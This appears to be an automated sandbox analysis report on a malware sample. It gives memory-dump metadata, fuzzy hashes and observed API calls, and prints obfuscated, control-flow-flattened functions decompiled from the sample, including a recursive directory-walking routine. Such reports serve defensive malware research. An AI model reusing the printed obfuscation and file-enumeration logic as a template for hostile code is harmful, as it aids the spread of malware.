                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: e$m$Cg+$E/$_r*$_r*$aS$kI$;$y
                                          • API String ID: 0-1402005448
                                          • Opcode ID: d9ab6bbc9be6e8f19497e7ea6a0472d605529e157114d2f01a73206d6923be1a
                                          • Instruction ID: 69cf29abfcf2005df0567ff4834037e171559db3ec27bac8724858d3eed1dd69
                                          • Opcode Fuzzy Hash: d9ab6bbc9be6e8f19497e7ea6a0472d605529e157114d2f01a73206d6923be1a
                                          • Instruction Fuzzy Hash: 7DB1337190D3419FD398CF24C58A50BFBE2FBC4758F109A1EF195862A0C7B98A49CF86
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 90%
                                          			E006D1773(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                          				char _v4;
                                          				signed int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				signed int _v36;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				signed int _v48;
                                          				signed int _v52;
                                          				signed int _v56;
                                          				signed int _v60;
                                          				signed int _v64;
                                          				void* __ecx;
                                          				void* _t131;
                                          				void* _t148;
                                          				void* _t151;
                                          				signed int _t162;
                                          				void* _t164;
                                          				signed int* _t167;
                                          
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				E006C602B(_t131);
                                          				_v32 = 0x943f;
                                          				_t167 =  &(( &_v64)[6]);
                                          				_t164 = 0;
                                          				_t151 = 0x349de80e;
                                          				_t162 = 0x48;
                                          				_v32 = _v32 * 0x69;
                                          				_v32 = _v32 ^ 0x003ccdd6;
                                          				_v56 = 0x5d22;
                                          				_v56 = _v56 << 0xb;
                                          				_v56 = _v56 * 0x6c;
                                          				_v56 = _v56 >> 0xc;
                                          				_v56 = _v56 ^ 0x0003a52d;
                                          				_v48 = 0xb9ad;
                                          				_v48 = _v48 / _t162;
                                          				_v48 = _v48 | 0x8e45101b;
                                          				_v48 = _v48 ^ 0xce45129f;
                                          				_v16 = 0x4535;
                                          				_v16 = _v16 + 0xffff440f;
                                          				_v16 = _v16 ^ 0xbfff8944;
                                          				_v24 = 0xd710;
                                          				_v24 = _v24 << 4;
                                          				_v24 = _v24 ^ 0x000d4c75;
                                          				_v44 = 0x65fd;
                                          				_v44 = _v44 >> 2;
                                          				_v44 = _v44 | 0x32207922;
                                          				_v44 = _v44 ^ 0x322078de;
                                          				_v28 = 0xded8;
                                          				_v28 = _v28 ^ 0x86a01735;
                                          				_v28 = _v28 ^ 0x86a0c6d1;
                                          				_v64 = 0xdb93;
                                          				_v64 = _v64 + 0x597e;
                                          				_v64 = _v64 << 0xa;
                                          				_v64 = _v64 << 0xa;
                                          				_v64 = _v64 ^ 0x5110354e;
                                          				_v60 = 0x2ada;
                                          				_v60 = _v60 | 0x1c3e2a8f;
                                          				_v60 = _v60 + 0xf49a;
                                          				_v60 = _v60 ^ 0xe6209c52;
                                          				_v60 = _v60 ^ 0xfa1f8dfc;
                                          				_v20 = 0xdaa6;
                                          				_v20 = _v20 + 0xb461;
                                          				_v20 = _v20 ^ 0x0001dcca;
                                          				_v40 = 0x4872;
                                          				_v40 = _v40 >> 0xe;
                                          				_v40 = _v40 ^ 0xb451885a;
                                          				_v40 = _v40 ^ 0xb451b970;
                                          				_v36 = 0x262e;
                                          				_v36 = _v36 >> 0xf;
                                          				_v36 = _v36 + 0x6428;
                                          				_v36 = _v36 ^ 0x00003c11;
                                          				_v8 = 0x6e80;
                                          				_v8 = _v8 << 0xc;
                                          				_v8 = _v8 ^ 0x06e82b80;
                                          				_v12 = 0x3e9d;
                                          				_v12 = _v12 >> 3;
                                          				_v12 = _v12 ^ 0x00005153;
                                          				_v52 = 0x8462;
                                          				_v52 = _v52 ^ 0xcdf70fa2;
                                          				_v52 = _v52 ^ 0xe5a9b23c;
                                          				_v52 = _v52 | 0x26296c1d;
                                          				_v52 = _v52 ^ 0x2e7f2e4a;
                                          				do {
                                          					while(_t151 != 0x6cb1230) {
                                          						if(_t151 == 0x944062a) {
                                          							_push(_t151);
                                          							_push(_t151);
                                          							_t164 = E006C8736(_v4 + _v4);
                                          							if(_t164 != 0) {
                                          								_t151 = 0x6cb1230;
                                          								continue;
                                          							}
                                          						} else {
                                          							if(_t151 == 0x30a4ce3e) {
                                          								_t148 = E006D77A3(_a4,  &_v4, _v24, _v44, _a8, _v28, 0, _v64, _v48 | _v32);
                                          								_t167 =  &(_t167[7]);
                                          								if(_t148 != 0) {
                                          									_t151 = 0x944062a;
                                          									continue;
                                          								}
                                          							} else {
                                          								if(_t151 != 0x349de80e) {
                                          									goto L11;
                                          								} else {
                                          									_t151 = 0x30a4ce3e;
                                          									continue;
                                          								}
                                          							}
                                          						}
                                          						goto L12;
                                          					}
                                          					E006D77A3(_a4,  &_v4, _v36, _v8, _a8, _v12, _t164, _v52, _v16 | _v56);
                                          					_t167 =  &(_t167[7]);
                                          					_t151 = 0x222ae378;
                                          					L11:
                                          				} while (_t151 != 0x222ae378);
                                          				L12:
                                          				return _t164;
                                          			}


                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: "]$"y 2$(d$5E$SQ$rH$uL$x*"$x*"$~Y
                                          • API String ID: 0-656425227
                                          • Opcode ID: e7280d44e7a884410bcaec10a4673638d73f0fd9bd229187a27b5946fca426a3
                                          • Instruction ID: 3cef023b1d38c09324cbb1ed22be030f3f53002b62e81933fab516292acc3e20
                                          • Opcode Fuzzy Hash: e7280d44e7a884410bcaec10a4673638d73f0fd9bd229187a27b5946fca426a3
                                          • Instruction Fuzzy Hash: 366132715083819FD354CF60C89982BBBE2BBC5788F10491DF5969A260D3B5CA08CF83
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • StgSerializePropVariant.PROPSYS(?,?,?,?,?,?,10002FCC,?,?), ref: 10002741
                                          • CryptBinaryToStringW.CRYPT32(?,?,40000001,00000000,?), ref: 10002761
                                          • CoTaskMemAlloc.OLE32(?), ref: 10002782
                                          • CryptBinaryToStringW.CRYPT32(?,?,40000001,00000000,?), ref: 100027AA
                                          • CoTaskMemFree.OLE32(00000000), ref: 100027CC
                                          • CoTaskMemFree.OLE32(?), ref: 100027D6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: Task$BinaryCryptFreeString$AllocPropSerializeVariant
                                          • String ID: o
                                          • API String ID: 207024522-3306556724
                                          • Opcode ID: 00f394acfb645895ae8b55d7716a322e047d0b4f2a77fad1ab660e857ddb64e1
                                          • Instruction ID: 41362f2d7e868ca1a04e6972f66fe0b1fe61006e645ec082c551d45625b46eb2
                                          • Opcode Fuzzy Hash: 00f394acfb645895ae8b55d7716a322e047d0b4f2a77fad1ab660e857ddb64e1
                                          • Instruction Fuzzy Hash: 1E114F7BD00129BBEB119BA4CC44EDE7BB9EF447A1F124162FD45E7224DB318E409AE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 83%
                                          			E006D2B16(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20) {
                                          				char _v520;
                                          				char _v1040;
                                          				short _v1584;
                                          				short _v1586;
                                          				char _v1588;
                                          				signed int _v1632;
                                          				signed int _v1636;
                                          				unsigned int _v1640;
                                          				signed int _v1644;
                                          				signed int _v1648;
                                          				signed int _v1652;
                                          				signed int _v1656;
                                          				signed int _v1660;
                                          				signed int _v1664;
                                          				signed int _v1668;
                                          				signed int _v1672;
                                          				signed int _v1676;
                                          				signed int _v1680;
                                          				signed int _v1684;
                                          				signed int _v1688;
                                          				signed int _v1692;
                                          				signed int _v1696;
                                          				unsigned int _v1700;
                                          				signed int _v1704;
                                          				signed int _v1708;
                                          				signed int _v1712;
                                          				signed int _v1716;
                                          				signed int _v1720;
                                          				signed int _v1724;
                                          				signed int _v1728;
                                          				signed int _v1732;
                                          				signed int _v1736;
                                          				signed int _v1740;
                                          				signed int _v1744;
                                          				signed int _v1748;
                                          				signed int _v1752;
                                          				signed int _v1756;
                                          				signed int _v1760;
                                          				void* __edx;
                                          				void* _t314;
                                          				signed int _t340;
                                          				signed int _t342;
                                          				signed int _t346;
                                          				void* _t348;
                                          				void* _t354;
                                          				signed int _t358;
                                          				void* _t360;
                                          				void* _t389;
                                          				signed int _t400;
                                          				signed int _t401;
                                          				signed int _t402;
                                          				signed int _t403;
                                          				signed int _t404;
                                          				void* _t408;
                                          				void* _t409;
                                          
                                          				_push(_a20);
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E006C602B(_t314);
                                          				_v1672 = 0x92f4;
                                          				_t409 = _t408 + 0x1c;
                                          				_t354 = 0x3181563a;
                                          				_t400 = 0x5d;
                                          				_v1672 = _v1672 / _t400;
                                          				_v1672 = _v1672 ^ 0xa72c55b3;
                                          				_v1672 = _v1672 ^ 0xa72c5437;
                                          				_v1736 = 0x461f;
                                          				_v1736 = _v1736 + 0xd353;
                                          				_v1736 = _v1736 + 0xffff7400;
                                          				_v1736 = _v1736 + 0xffff12e8;
                                          				_v1736 = _v1736 ^ 0xffffeb08;
                                          				_v1684 = 0x12ca;
                                          				_v1684 = _v1684 + 0xffffbd30;
                                          				_v1684 = _v1684 + 0xc084;
                                          				_v1684 = _v1684 ^ 0x00009b25;
                                          				_v1700 = 0x68fe;
                                          				_v1700 = _v1700 >> 0x10;
                                          				_v1700 = _v1700 >> 0xf;
                                          				_v1700 = _v1700 ^ 0x000058ac;
                                          				_v1676 = 0xc4c1;
                                          				_v1676 = _v1676 + 0x377e;
                                          				_v1676 = _v1676 + 0xffff6b29;
                                          				_v1676 = _v1676 ^ 0x0000377c;
                                          				_v1708 = 0x7055;
                                          				_v1708 = _v1708 << 0xe;
                                          				_v1708 = _v1708 ^ 0x1eb23ae3;
                                          				_v1708 = _v1708 ^ 0x02a72f08;
                                          				_v1648 = 0x750a;
                                          				_v1648 = _v1648 | 0xec573941;
                                          				_v1648 = _v1648 ^ 0xec5707ed;
                                          				_v1744 = 0xfcbf;
                                          				_t401 = 0x2c;
                                          				_v1744 = _v1744 * 0x3d;
                                          				_v1744 = _v1744 >> 0xd;
                                          				_v1744 = _v1744 / _t401;
                                          				_v1744 = _v1744 ^ 0x00003058;
                                          				_v1636 = 0x9933;
                                          				_v1636 = _v1636 << 3;
                                          				_v1636 = _v1636 ^ 0x0004b1ef;
                                          				_v1668 = 0xb76d;
                                          				_v1668 = _v1668 | 0xef4f757f;
                                          				_v1668 = _v1668 ^ 0xef4ff671;
                                          				_v1656 = 0xf145;
                                          				_v1656 = _v1656 + 0x1194;
                                          				_v1656 = _v1656 ^ 0x00010bb0;
                                          				_v1752 = 0xf3e9;
                                          				_t402 = 0x49;
                                          				_v1752 = _v1752 / _t402;
                                          				_v1752 = _v1752 + 0x9c03;
                                          				_v1752 = _v1752 + 0xffffb211;
                                          				_v1752 = _v1752 ^ 0x000027fb;
                                          				_v1728 = 0x648a;
                                          				_v1728 = _v1728 ^ 0x1010be16;
                                          				_v1728 = _v1728 * 0x14;
                                          				_v1728 = _v1728 | 0x258edfa9;
                                          				_v1728 = _v1728 ^ 0x65dfe7b9;
                                          				_v1688 = 0x4eab;
                                          				_v1688 = _v1688 << 0xa;
                                          				_v1688 = _v1688 | 0x3ca08384;
                                          				_v1688 = _v1688 ^ 0x3dba9eb2;
                                          				_v1756 = 0xd2f4;
                                          				_t403 = 0x23;
                                          				_v1756 = _v1756 / _t403;
                                          				_v1756 = _v1756 ^ 0xcde225b2;
                                          				_t404 = 0x6e;
                                          				_v1756 = _v1756 / _t404;
                                          				_v1756 = _v1756 ^ 0x01df76bd;
                                          				_v1760 = 0x6cd1;
                                          				_v1760 = _v1760 * 0x7d;
                                          				_v1760 = _v1760 ^ 0x8e200a23;
                                          				_v1760 = _v1760 >> 3;
                                          				_v1760 = _v1760 ^ 0x11c2d811;
                                          				_v1640 = 0xac3a;
                                          				_v1640 = _v1640 >> 3;
                                          				_v1640 = _v1640 ^ 0x00004856;
                                          				_v1748 = 0x4fc2;
                                          				_v1748 = _v1748 >> 0xf;
                                          				_v1748 = _v1748 * 0x31;
                                          				_v1748 = _v1748 ^ 0x38a83a44;
                                          				_v1748 = _v1748 ^ 0x38a82be9;
                                          				_v1680 = 0xb86a;
                                          				_v1680 = _v1680 | 0x02231922;
                                          				_v1680 = _v1680 + 0xaf06;
                                          				_v1680 = _v1680 ^ 0x022411a2;
                                          				_v1644 = 0x3f39;
                                          				_v1644 = _v1644 + 0xffff5bb9;
                                          				_v1644 = _v1644 ^ 0xffffc632;
                                          				_v1692 = 0xc5f9;
                                          				_v1692 = _v1692 ^ 0xaafe79bc;
                                          				_v1692 = _v1692 >> 0xf;
                                          				_v1692 = _v1692 ^ 0x00013e0d;
                                          				_v1740 = 0x58ed;
                                          				_v1740 = _v1740 + 0xffff3fce;
                                          				_v1740 = _v1740 * 0x34;
                                          				_v1740 = _v1740 * 0x49;
                                          				_v1740 = _v1740 ^ 0xfa04971a;
                                          				_v1696 = 0xcc7a;
                                          				_v1696 = _v1696 >> 4;
                                          				_v1696 = _v1696 << 1;
                                          				_v1696 = _v1696 ^ 0x00000d26;
                                          				_v1732 = 0xc33a;
                                          				_v1732 = _v1732 | 0xb66c57ae;
                                          				_v1732 = _v1732 >> 5;
                                          				_v1732 = _v1732 * 0x56;
                                          				_v1732 = _v1732 ^ 0xea449beb;
                                          				_v1712 = 0xdae0;
                                          				_v1712 = _v1712 >> 0xc;
                                          				_v1712 = _v1712 ^ 0xc13d67df;
                                          				_v1712 = _v1712 ^ 0xc13d455b;
                                          				_v1716 = 0x5478;
                                          				_v1716 = _v1716 | 0xa382055d;
                                          				_v1716 = _v1716 * 0x26;
                                          				_v1716 = _v1716 ^ 0x4558c259;
                                          				_v1720 = 0xeafc;
                                          				_v1720 = _v1720 + 0xffff5250;
                                          				_v1720 = _v1720 ^ 0x4a0f2ed9;
                                          				_v1720 = _v1720 ^ 0x4a0f1f8c;
                                          				_v1664 = 0x8e28;
                                          				_v1664 = _v1664 ^ 0x7b061f8d;
                                          				_v1664 = _v1664 + 0xffffa0ec;
                                          				_v1664 = _v1664 ^ 0x7b062de0;
                                          				_v1724 = 0xce31;
                                          				_v1724 = _v1724 << 0xe;
                                          				_v1724 = _v1724 << 7;
                                          				_v1724 = _v1724 << 5;
                                          				_v1724 = _v1724 ^ 0xc4004273;
                                          				_v1704 = 0xa554;
                                          				_v1704 = _v1704 << 5;
                                          				_v1704 = _v1704 * 0x35;
                                          				_v1704 = _v1704 ^ 0x04475614;
                                          				_v1660 = 0xb9dc;
                                          				_v1660 = _v1660 + 0x9e03;
                                          				_v1660 = _v1660 ^ 0x00011a8b;
                                          				_v1652 = 0xf227;
                                          				_t399 = _v1660;
                                          				_v1652 = _v1652 / _t404;
                                          				_v1652 = _v1652 ^ 0x00007d1f;
                                          				while(1) {
                                          					L1:
                                          					_t389 = 0x2e;
                                          					L2:
                                          					while(_t354 != 0x2ecc014) {
                                          						if(_t354 == 0xf8b22d1) {
                                          							__eflags = _v1632 & _v1672;
                                          							if(__eflags == 0) {
                                          								_t340 = _a8( &_v1632, _a20);
                                          								asm("sbb ecx, ecx");
                                          								_t358 =  ~_t340 & 0x1c386f3a;
                                          								L13:
                                          								_t354 = _t358 + 0x2ecc014;
                                          								while(1) {
                                          									L1:
                                          									_t389 = 0x2e;
                                          									goto L2;
                                          								}
                                          							}
                                          							__eflags = _v1588 - _t389;
                                          							if(_v1588 != _t389) {
                                          								L20:
                                          								__eflags = _a16;
                                          								if(__eflags != 0) {
                                          									_push(_v1760);
                                          									_t348 = E006D889D(0x6dc0b0, _v1756, __eflags);
                                          									_pop(_t360);
                                          									E006CC680( &_v1588, _v1748, _v1680, _t360, _v1644, _a4, _t348,  &_v520);
                                          									E006D2B16(_v1692,  &_v520, _a8, _v1696, _a16, _a20);
                                          									_t409 = _t409 + 0x30;
                                          									_t346 = E006D2025(_v1732, _t348, _v1712, _v1716);
                                          									_t389 = 0x2e;
                                          								}
                                          								L19:
                                          								_t354 = 0x1f252f4e;
                                          								continue;
                                          							}
                                          							__eflags = _v1586;
                                          							if(__eflags == 0) {
                                          								goto L19;
                                          							}
                                          							__eflags = _v1586 - _t389;
                                          							if(_v1586 != _t389) {
                                          								goto L20;
                                          							}
                                          							__eflags = _v1584;
                                          							if(__eflags != 0) {
                                          								goto L20;
                                          							}
                                          							goto L19;
                                          						}
                                          						if(_t354 == 0x1f252f4e) {
                                          							_t342 = E006C595A(_v1720, _t399,  &_v1632, _v1664);
                                          							asm("sbb ecx, ecx");
                                          							_t358 =  ~_t342 & 0x0c9e62bd;
                                          							__eflags = _t358;
                                          							goto L13;
                                          						}
                                          						if(_t354 == 0x21983c19) {
                                          							_push(_v1684);
                                          							E006D7BAF(__eflags,  &_v1040, _v1676, _a4, _v1708, _v1648, E006D889D(0x6dc090, _v1736, __eflags));
                                          							_t346 = E006D2025(_v1744, _t343, _v1636, _v1668);
                                          							_t409 = _t409 + 0x20;
                                          							_t354 = 0x3298743a;
                                          							while(1) {
                                          								L1:
                                          								_t389 = 0x2e;
                                          								goto L2;
                                          							}
                                          						}
                                          						if(_t354 == 0x3181563a) {
                                          							_t354 = 0x21983c19;
                                          							continue;
                                          						}
                                          						if(_t354 != 0x3298743a) {
                                          							L24:
                                          							__eflags = _t354 - 0x2a8aa181;
                                          							if(__eflags != 0) {
                                          								continue;
                                          							}
                                          							L25:
                                          							return _t346;
                                          						}
                                          						_t346 = E006C109C(_v1656,  &_v1040,  &_v1632, _v1752, _v1728, _v1688);
                                          						_t399 = _t346;
                                          						_t409 = _t409 + 0x10;
                                          						if(_t346 == 0xffffffff) {
                                          							goto L25;
                                          						}
                                          						_t354 = 0xf8b22d1;
                                          						goto L1;
                                          					}
                                          					E006C1B5C(_v1724, _v1704, _v1660, _t399, _v1652);
                                          					_t409 = _t409 + 0xc;
                                          					_t354 = 0x2a8aa181;
                                          					_t389 = 0x2e;
                                          					goto L24;
                                          				}
                                          			}



























































                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: &$9?$A9W$Up$VH$sB$xT$|7$X
                                          • API String ID: 0-983689062
                                          • Opcode ID: b92c49d20b95d13e8a7ce97004494747eabce3830e22ef00dbe14e9fda45c7b0
                                          • Instruction ID: ee0c00cda8715282afd3cc424ef2a62d38e15424b609078040c9f5abbe44bfbe
                                          • Opcode Fuzzy Hash: b92c49d20b95d13e8a7ce97004494747eabce3830e22ef00dbe14e9fda45c7b0
                                          • Instruction Fuzzy Hash: 64F103719083819FD368CF61C549A5BFBE2FBC4358F108A1DF29A862A0D7B58949CF47
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 99%
                                          			E006C88E5(intOrPtr __ecx, intOrPtr* __edx) {
                                          				intOrPtr _t325;
                                          				short* _t331;
                                          				signed int _t340;
                                          				signed int _t341;
                                          				signed int _t342;
                                          				signed int _t343;
                                          				short _t373;
                                          				void* _t376;
                                          				intOrPtr* _t380;
                                          				void* _t382;
                                          
                                          				 *(_t382 + 8) = 0xaa86;
                                          				 *(_t382 + 8) =  *(_t382 + 8) + 0xffffe070;
                                          				 *(_t382 + 8) =  *(_t382 + 8) << 0xc;
                                          				 *(_t382 + 8) =  *(_t382 + 8) << 6;
                                          				 *(_t382 + 8) =  *(_t382 + 8) ^ 0x2bd80002;
                                          				 *(_t382 + 0x64) = 0xdd5d;
                                          				 *(_t382 + 0x64) =  *(_t382 + 0x64) ^ 0x3d690a55;
                                          				 *(_t382 + 0x64) =  *(_t382 + 0x64) ^ 0x3d69d718;
                                          				 *(_t382 + 0x74) = 0x57af;
                                          				_t380 = __edx;
                                          				 *((intOrPtr*)(_t382 + 0x9c)) = __ecx;
                                          				_t373 = 0;
                                          				_t340 = 5;
                                          				 *(_t382 + 0x88) =  *(_t382 + 0x74) / _t340;
                                          				 *(_t382 + 0x88) =  *(_t382 + 0x88) ^ 0x40001189;
                                          				_t376 = 0x1f5a6ea2;
                                          				 *(_t382 + 0x68) = 0xf929;
                                          				 *(_t382 + 0x68) =  *(_t382 + 0x68) ^ 0xb70a9a6f;
                                          				 *(_t382 + 0x68) =  *(_t382 + 0x68) ^ 0xb70a6fd1;
                                          				 *(_t382 + 0x74) = 0x8254;
                                          				 *(_t382 + 0x74) =  *(_t382 + 0x74) << 2;
                                          				 *(_t382 + 0x74) =  *(_t382 + 0x74) ^ 0x00022a5c;
                                          				 *(_t382 + 0x48) = 0x274c;
                                          				_t341 = 0x4c;
                                          				 *(_t382 + 0x48) =  *(_t382 + 0x48) * 0x48;
                                          				 *(_t382 + 0x48) =  *(_t382 + 0x48) ^ 0x4b411b57;
                                          				 *(_t382 + 0x48) =  *(_t382 + 0x48) ^ 0x4b4a2351;
                                          				 *(_t382 + 0x7c) = 0x6684;
                                          				 *(_t382 + 0x7c) =  *(_t382 + 0x7c) + 0xaed9;
                                          				 *(_t382 + 0x7c) =  *(_t382 + 0x7c) ^ 0x00014ccf;
                                          				 *(_t382 + 0x40) = 0x1902;
                                          				 *(_t382 + 0x40) =  *(_t382 + 0x40) ^ 0x72d0747c;
                                          				 *(_t382 + 0x40) =  *(_t382 + 0x40) / _t341;
                                          				 *(_t382 + 0x40) =  *(_t382 + 0x40) ^ 0x01828d69;
                                          				 *(_t382 + 0x6c) = 0xb89b;
                                          				 *(_t382 + 0x6c) =  *(_t382 + 0x6c) + 0xffffd32a;
                                          				 *(_t382 + 0x6c) =  *(_t382 + 0x6c) ^ 0x0000fcd5;
                                          				 *(_t382 + 0x14) = 0x3892;
                                          				 *(_t382 + 0x14) =  *(_t382 + 0x14) >> 0xa;
                                          				 *(_t382 + 0x14) =  *(_t382 + 0x14) ^ 0x2d57d543;
                                          				 *(_t382 + 0x14) =  *(_t382 + 0x14) + 0x6cb7;
                                          				 *(_t382 + 0x14) =  *(_t382 + 0x14) ^ 0x2d585a45;
                                          				 *(_t382 + 0x28) = 0xad3d;
                                          				 *(_t382 + 0x28) =  *(_t382 + 0x28) + 0xffffae8b;
                                          				 *(_t382 + 0x28) =  *(_t382 + 0x28) >> 2;
                                          				 *(_t382 + 0x28) =  *(_t382 + 0x28) << 7;
                                          				 *(_t382 + 0x28) =  *(_t382 + 0x28) ^ 0x000b51d9;
                                          				 *(_t382 + 0x58) = 0xde2;
                                          				_t342 = 0x39;
                                          				 *(_t382 + 0x54) =  *(_t382 + 0x58) * 0x34;
                                          				 *(_t382 + 0x54) =  *(_t382 + 0x54) / _t342;
                                          				 *(_t382 + 0x54) =  *(_t382 + 0x54) ^ 0x00000d30;
                                          				 *(_t382 + 0x1c) = 0xba82;
                                          				 *(_t382 + 0x1c) =  *(_t382 + 0x1c) << 4;
                                          				 *(_t382 + 0x1c) =  *(_t382 + 0x1c) >> 0xc;
                                          				 *(_t382 + 0x1c) =  *(_t382 + 0x1c) ^ 0xd59b4b7c;
                                          				 *(_t382 + 0x1c) =  *(_t382 + 0x1c) ^ 0xd59b12fd;
                                          				 *(_t382 + 0x40) = 0xa3d9;
                                          				 *(_t382 + 0x40) =  *(_t382 + 0x40) ^ 0xd82378ca;
                                          				 *(_t382 + 0x40) =  *(_t382 + 0x40) + 0xffff3c17;
                                          				 *(_t382 + 0x40) =  *(_t382 + 0x40) ^ 0xd8236a86;
                                          				 *(_t382 + 0x5c) = 0xecab;
                                          				 *(_t382 + 0x5c) =  *(_t382 + 0x5c) >> 0x10;
                                          				 *(_t382 + 0x5c) =  *(_t382 + 0x5c) ^ 0x7d98124e;
                                          				 *(_t382 + 0x5c) =  *(_t382 + 0x5c) ^ 0x7d9832d2;
                                          				 *(_t382 + 0x80) = 0x1387;
                                          				_t343 = 0x2a;
                                          				 *(_t382 + 0x80) =  *(_t382 + 0x80) * 0x63;
                                          				 *(_t382 + 0x80) =  *(_t382 + 0x80) ^ 0x0007c428;
                                          				 *(_t382 + 0x4c) = 0x7ada;
                                          				 *(_t382 + 0x4c) =  *(_t382 + 0x4c) * 0x39;
                                          				 *(_t382 + 0x4c) =  *(_t382 + 0x4c) + 0xffffefa5;
                                          				 *(_t382 + 0x4c) =  *(_t382 + 0x4c) ^ 0x001b3452;
                                          				 *(_t382 + 0x90) = 0x1591;
                                          				 *(_t382 + 0x90) =  *(_t382 + 0x90) >> 8;
                                          				 *(_t382 + 0x90) =  *(_t382 + 0x90) ^ 0x0000431e;
                                          				 *(_t382 + 0x2c) = 0x3f89;
                                          				 *(_t382 + 0x2c) =  *(_t382 + 0x2c) << 5;
                                          				 *(_t382 + 0x2c) =  *(_t382 + 0x2c) | 0xff33b819;
                                          				 *(_t382 + 0x2c) =  *(_t382 + 0x2c) << 7;
                                          				 *(_t382 + 0x2c) =  *(_t382 + 0x2c) ^ 0x9bfcb078;
                                          				 *(_t382 + 0x98) = 0x7441;
                                          				 *(_t382 + 0x98) =  *(_t382 + 0x98) / _t343;
                                          				 *(_t382 + 0x98) =  *(_t382 + 0x98) ^ 0x000035d7;
                                          				 *(_t382 + 0x48) = 0x7f1e;
                                          				 *(_t382 + 0x48) =  *(_t382 + 0x48) + 0x7f31;
                                          				 *(_t382 + 0x48) =  *(_t382 + 0x48) << 0xe;
                                          				 *(_t382 + 0x48) =  *(_t382 + 0x48) ^ 0x3f939bef;
                                          				 *(_t382 + 0x8c) = 0x831c;
                                          				 *(_t382 + 0x8c) =  *(_t382 + 0x8c) << 8;
                                          				 *(_t382 + 0x8c) =  *(_t382 + 0x8c) ^ 0x008363dd;
                                          				 *(_t382 + 0x30) = 0x92b6;
                                          				 *(_t382 + 0x30) =  *(_t382 + 0x30) + 0xa4c2;
                                          				 *(_t382 + 0x30) =  *(_t382 + 0x30) << 0xc;
                                          				 *(_t382 + 0x30) =  *(_t382 + 0x30) << 8;
                                          				 *(_t382 + 0x30) =  *(_t382 + 0x30) ^ 0x77802bdf;
                                          				 *(_t382 + 0x28) = 0x1d89;
                                          				 *(_t382 + 0x28) =  *(_t382 + 0x28) | 0xf9709c7c;
                                          				 *(_t382 + 0x28) =  *(_t382 + 0x28) * 0x25;
                                          				 *(_t382 + 0x28) =  *(_t382 + 0x28) | 0x703957df;
                                          				 *(_t382 + 0x28) =  *(_t382 + 0x28) ^ 0x7d7fbb45;
                                          				 *(_t382 + 0x58) = 0x126d;
                                          				 *(_t382 + 0x58) =  *(_t382 + 0x58) >> 3;
                                          				 *(_t382 + 0x58) =  *(_t382 + 0x58) >> 9;
                                          				 *(_t382 + 0x58) =  *(_t382 + 0x58) ^ 0x000002d5;
                                          				 *(_t382 + 0x7c) = 0x1a69;
                                          				 *(_t382 + 0x7c) =  *(_t382 + 0x7c) | 0x10216cf6;
                                          				 *(_t382 + 0x7c) =  *(_t382 + 0x7c) ^ 0x102141be;
                                          				 *(_t382 + 0x20) = 0xff0b;
                                          				 *(_t382 + 0x20) =  *(_t382 + 0x20) >> 0x10;
                                          				 *(_t382 + 0x20) =  *(_t382 + 0x20) << 7;
                                          				 *(_t382 + 0x20) =  *(_t382 + 0x20) * 0x21;
                                          				 *(_t382 + 0x20) =  *(_t382 + 0x20) ^ 0x000040df;
                                          				 *(_t382 + 0x6c) = 0xe12c;
                                          				 *(_t382 + 0x6c) =  *(_t382 + 0x6c) + 0x79cf;
                                          				 *(_t382 + 0x6c) =  *(_t382 + 0x6c) ^ 0x000152eb;
                                          				 *(_t382 + 0x34) = 0xd574;
                                          				 *(_t382 + 0x34) =  *(_t382 + 0x34) | 0x9559dde1;
                                          				 *(_t382 + 0x34) =  *(_t382 + 0x34) ^ 0x4f646285;
                                          				 *(_t382 + 0x34) =  *(_t382 + 0x34) + 0xffff68ed;
                                          				 *(_t382 + 0x34) =  *(_t382 + 0x34) ^ 0xda3d1e7a;
                                          				 *(_t382 + 0x88) = 0x5832;
                                          				 *(_t382 + 0x88) =  *(_t382 + 0x88) * 0x27;
                                          				 *(_t382 + 0x88) =  *(_t382 + 0x88) ^ 0x000d0611;
                                          				 *(_t382 + 0x50) = 0x55a1;
                                          				 *(_t382 + 0x50) =  *(_t382 + 0x50) << 0xf;
                                          				 *(_t382 + 0x50) =  *(_t382 + 0x50) ^ 0x45d5d069;
                                          				 *(_t382 + 0x50) =  *(_t382 + 0x50) ^ 0x6f0533ce;
